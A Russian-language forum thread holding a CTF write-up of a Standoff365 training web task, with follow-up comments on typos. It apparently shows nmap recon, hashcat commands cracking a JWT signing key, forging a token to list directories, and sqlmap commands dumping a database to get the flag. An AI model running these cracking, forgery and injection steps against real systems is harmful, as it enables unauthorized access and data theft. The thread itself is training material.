ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Задания/Квесты/CTF/Конкурсы (https://forum.antichat.xyz/forumdisplay.php?f=112)
-   -   [WriteUp] WEB-5 | tokenizer.edu.stf | Standoff365 (https://forum.antichat.xyz/showthread.php?t=1643968)

Archivist 13.09.2024 23:17

Cyberrange Задание: Bootcamp
1 Разведка nmap
2 Подготовка атаки
3 Перебор Jwt
4 Сharge token
5 Атака sql

Разведка nmap

Код:


Код:

PORT    STATE SERVICE    VERSION
22/tcp  open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|  3072 7e:85:4a:9f:e9:70:ed:e7:80:ca:0d:3a:f4:6b:8d:ff (RSA)
|  256 fa:68:91:c4:1f:dc:be:f2:5d:22:ba:be:25:90:c2:bb (ECDSA)
|_  256 2a:16:b9:fd:68:2a:48:c2:b6:2b:34:d3:5d:1c:89:1c (ED25519)
80/tcp  open  http      Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Test auth Server
|_http-server-header: Apache/2.4.41 (Ubuntu)
1720/tcp open  h323q931?
5432/tcp open  postgresql PostgreSQL DB 9.6.0 or later
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-02-08T11:04:29
|_Not valid after:  2031-02-06T11:04:29
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
|  SMBProgNeg:
|    SFATAL
|    VFATAL
|    C0A000
|    Munsupported frontend protocol 65363.19778: server supports 2.0 to 3.0
|    Fpostmaster.c
|    L2120
|_    RProcessStartupPacket
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5432-TCP:V=7.94SVN%I=7%D=8/24%Time=66C9E886%P=x86_64-pc-linux-gnu%r
SF:(SMBProgNeg,8C,"E\0\0\0\x8bSFATAL\0VFATAL\0C0A000\0Munsupported\x20fron
SF:tend\x20protocol\x2065363\.19778:\x20server\x20supports\x202\.0\x20to\x
SF:203\.0\0Fpostmaster\.c\0L2120\0RProcessStartupPacket\0\0");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Подготовка атаки
При входе на сайт мы видим следующую картину.

https://forum.antichat.xyz/attachmen...6254484894.png

Запрос
Код:

GET /token.php?Get+Test+token=Submit+Query
https://forum.antichat.xyz/attachmen...6254441395.png

Token : eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiS mFtZXMiLCJkaXIiOiJzYW1wbGVzIiwia2V5IjoicXdlcnR5Iiw idGltZXN0YW1wIjoxNzI0NTA3NTgwfQ.FGGagK9YlY2EHX52Sf _leBZ1HsneN9NREYcOGXZY2iw

Далее предлагаю вам ознакомиться с вот этим сайтом h ttps://jwt.io/
или h ttps://edgecenter.ru/dev-tools/decode-jwt
используем и видим

Изучив Рисунок 1 видим HS256 уже знаем что это слабый алгоритм шифрования(скорее всего его нужно будет ломать ) ➡

Как мы знаем один из стандартных способ узнать что то на сайт это перебор каталогов , в данном случае он нам даёт страничку http://10.124.1.239/check.php
ответ следующий :
Код:

Get param 'jwt' is not set
это намёк на это что его нужно указать...

Указываем его через
Код:

?jwt=
, результат это список файлов

https://forum.antichat.xyz/attachmen...6254597716.png

Из действий выше, логично предположить , что у нас есть Jwt в который вшит параметр dir, если мы сможем его поменять то мы увидим новые директории.
Перебор Jwt
Способ 1
Внимание на размер, качаем и

Weakpass

нужно подождать ... раз архивации следующей командой
gunzip HashesOrg.gz

начинаем атаку(учитывайте расположение файлов ) {jwt.txt указать Jwt в файле без изменений }
hashcat -a 0 -m 16500 jwt.txt ~/Downloads/HashesOrg
https://forum.antichat.xyz/attachmen...6254627123.png
Итог: 2e025(пароль для тех у кого слабый пк )

2 способ взлома

Код:

hashcat -a 3 -m 16500 /home/kali/Desktop/Document/ffuz_txt/jwt.txt ?a?a?a?a?a?a?a -i --increment-min=4
(**?a?a?a?a?a?a?a** : Это маска, которая указывает, что Hashcat будет перебирать все возможные символы (буквы, цифры и специальные символы) для семи позиций. Символ `?a` обозначает любой символ из набора ASCII.)

Сharge token
Наш токен
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiS mFtZXMiLCJkaXIiOiJzYW1wbGVzIiwia2V5IjoicXdlcnR5Iiw idGltZXN0YW1wIjoxNzI2MDQxMTEzfQ.8HexxHT5cLuhRVaUpC u7N-YML0zfHkUkCWrcYMs-MPM

Далее имея ключ мы можем поменять данные в нашем token.
либо полный путь как на скине /var/www/html
или указать ./
Обе команды покажут нам директории сайта, где находятся файлы

https://forum.antichat.xyz/attachmen...6254679029.png

Далее нужно указать наш новый токен

Способ1 указать ?jwt= в бюрпе

https://forum.antichat.xyz/attachmen...6254701347.png


Способ2 или просто на сайте в Url (таким же образом как на скрине)

Видим супер Супер "бупер" скрытую директорию

Переходим на данную ссылку и видим поля ввода пароля и логина ,( увидим формочку и вспомнив что в задании про sql я думал что тут ее и нужно тестить, НО ее тут нету)
Вводим ручками admin admin и переходим на следующую страницу где видим новые поля
Атака sql
Я использовал sqlmap для выполнения этой задачи, но вы могли сделать это другим способом.

Закидываем в файла pack http пакет из бюрпа и выполняем за комментированную команду
так как мы указываем куки в пакете , то поэтому не нужно указывать логин и пароль , что вводили до этого , если делаете по другому то нужно будет указать их скорее всего*

Код:


Код:

┌──(kali㉿kali)-[~/htb]
└─$ #sqlmap -r pack --level=5 --risk=3 --dbs --batch --random-agent --threads=10 --time-sec=5 --timeout=30 --ignore-code=404
cat pack
POST /supersecretadminloginyoullneverguess.php HTTP/1.1
Host: tokenizer.edu.stf
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Origin: http://tokenizer.edu.stf
DNT: 1
Connection: keep-alive
Cookie: _gcl_au=1.1.807887967.1724594292; _ga_E9PS2EVWYS=GS1.1.1724665941.2.1.1724676481.60.0.0; _ga=GA1.1.26186061.1724594292; _clck=1nao1d7%7C2%7Cfon%7C0%7C1698; _fbp=fb.1.1724594293979.186148304756426122; PHPSESSID=p80oov368a5mo6497j22dqhbuo
Upgrade-Insecure-Requests: 1

name=1&address=1&phone=1&email=1&plan=1&submit_search=Submit

available databases [3]:[*] information_schema[*] pg_catalog[*] public

Атака2 смотрим таблички

Код:


Код:

sqlmap -r pack --level=5 --risk=3 --tables -D public --batch --random-agent

+--------------+
| clients_data |
| secret      |
+--------------+



ищем колонку флаг

Код:


Код:

sqlmap -r pack --level=5 --risk=3 --columns -D public -T clients_data --batch --random-agent

+---------+---------+
| Column  | Type    |
+---------+---------+
| name    | varchar |
| address | text    |
| email  | varchar |
| id      | int4    |
| phone  | varchar |
| plan    | varchar |
+---------+---------+

sqlmap -r pack --level=5 --risk=3 --columns -D public -T secret --batch --random-agent

+--------+--------+
| Column | Type  |
+--------+--------+
| flag  | bpchar |
| id    | int4  |
+--------+--------+

Находим и смотрим

Код:

sqlmap -r pack --level=5 --risk=3 --dump -D public -T secret --batch --random-agent
Код:


Код:

+----+--------------------------------------+
| id | flag                                |
+----+--------------------------------------+
| 1  | 32они_запрещают_делиться_флагамe58bd |
+----+--------------------------------------+


ALT1RE 16.09.2024 11:51

Если перед публикацией перечитывать статью и исправлять ошибки, то материал становится в разы интереснее.

Gustavo Fring 16.09.2024 12:57

Цитата:


ALT1RE сказал(а):

Если перед публикацией перечитывать статью и исправлять ошибки, то материал становится в разы интереснее.


Пишите про найденные ошибки/опечатки. Автор думаю будет рад исправлять.

ALT1RE 16.09.2024 17:45

Ок.
Начнем с этих:
Цитата:


asdfqw3e сказал(а):

При заходи на сайт видим след картину


Цитата:


asdfqw3e сказал(а):

Думаю от нас что то хотя сделать с Jwt и отправить его сюда


Цитата:


asdfqw3e сказал(а):

как вы помните одна из payloads это параметр dir который мы будем менять


Цитата:


asdfqw3e сказал(а):

нужно подождать ... разархивации след командой


Цитата:


asdfqw3e сказал(а):

Далее имя ключ мы можем поменять данные в нашем токене


Цитата:


asdfqw3e сказал(а):

Обе команды покажут нам директории сайта где находиться файла


Цитата:


asdfqw3e сказал(а):

Видим крутую директорию Супеб бупер скрытая директория


Цитата:


asdfqw3e сказал(а):

,(я кста сначала что тут sql ... но тут нету_(╯︿╰)


Цитата:


asdfqw3e сказал(а):

я выполнял через sqlmap вы могли это сделать это по другому,



Gustavo Fring 16.09.2024 17:54

Цитата:


ALT1RE сказал(а):

Ок.
Начнем с этих:


@asdfqw3e

Archivist 16.09.2024 20:16

Цитата:


ALT1RE сказал(а):

Ок.
Начнем с этих:


Да спасибо за ответ , учту эти ошибки

holodog1331 15.03.2025 00:59

Можно помощь?

https://forum.antichat.xyz/attachmen...1985955025.png

Archivist 15.03.2025 11:15

Цитата:


holodog1331 сказал(а):

Можно помощь?

а в чем вопрос то? я то уже не помню само задание напомни




Время: 02:51